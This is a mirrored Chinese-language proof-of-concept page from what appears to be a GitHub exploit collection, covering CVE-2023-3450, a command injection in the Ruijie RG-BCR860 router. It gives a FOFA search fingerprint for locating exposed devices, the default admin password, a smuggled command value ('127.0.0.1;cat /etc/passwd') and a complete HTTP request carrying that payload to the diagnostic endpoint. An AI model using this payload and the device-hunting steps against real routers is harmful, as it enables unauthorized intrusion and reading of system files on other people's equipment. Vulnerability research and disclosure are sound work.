mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-07 19:35:52 +00:00
46 lines
2.2 KiB
Markdown
46 lines
2.2 KiB
Markdown
# 锐捷RG-BCR860路由器命令执行漏洞(CVE-2023-3450)
|
||
|
||
# 一、漏洞简介
|
||
RG-BCR860是锐捷网络推出的一款商业云路由器,它是专为酒店、餐饮、门店设计,适用带宽100Mbps,带机量可达150台,支持Sec VPM、内置安全审计模块,给商家带来更好的网络营销体验 。该产品主支持全中文的WEB 界面配置,不再需要用传统的命令行进行配置,使得设备更加简单方便的进行维护和管理。RG-BCR860 2.5.13版本存在操作系统命令注入漏洞,该漏洞源于组件Network Diagnostic Page存在问题,会导致操作系统命令注入。
|
||
|
||
# 二、影响版本
|
||
+ 锐捷路由器RG-BCR860
|
||
|
||
# 三、资产测绘
|
||
+ fofa`icon_hash="-399311436"`
|
||
|
||

|
||
|
||
+ 登录页面
|
||
|
||

|
||
|
||
# 四、漏洞复现
|
||
1. 该漏洞属于后台漏洞,需要登录后台(默认密码:admin)
|
||
|
||

|
||
|
||
2. 漏洞位置:网络诊断->Tracert检测->输入`127.0.0.1;cat /etc/passwd`
|
||
|
||

|
||
|
||
3. 数据包
|
||
|
||
```plain
|
||
GET /cgi-bin/luci/;stok=8bbbc7db8f9e3d2d972bd7ab13f21a75/admin/diagnosis?diag=tracert&tracert_address=127.0.0.1%3Bcat+%2Fetc%2Fpasswd&seq=20 HTTP/1.1
|
||
Host: xx.xx.xx.xx
|
||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
|
||
Accept: */*
|
||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||
Accept-Encoding: gzip, deflate
|
||
X-Requested-With: XMLHttpRequest
|
||
Connection: close
|
||
Cookie: sysauth=698164456dede213f8f15cebba269273
|
||
```
|
||
|
||

|
||
|
||
|
||
|
||
> 更新: 2024-06-24 11:42:27
|
||
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/iodb45mpku6ufxa5> |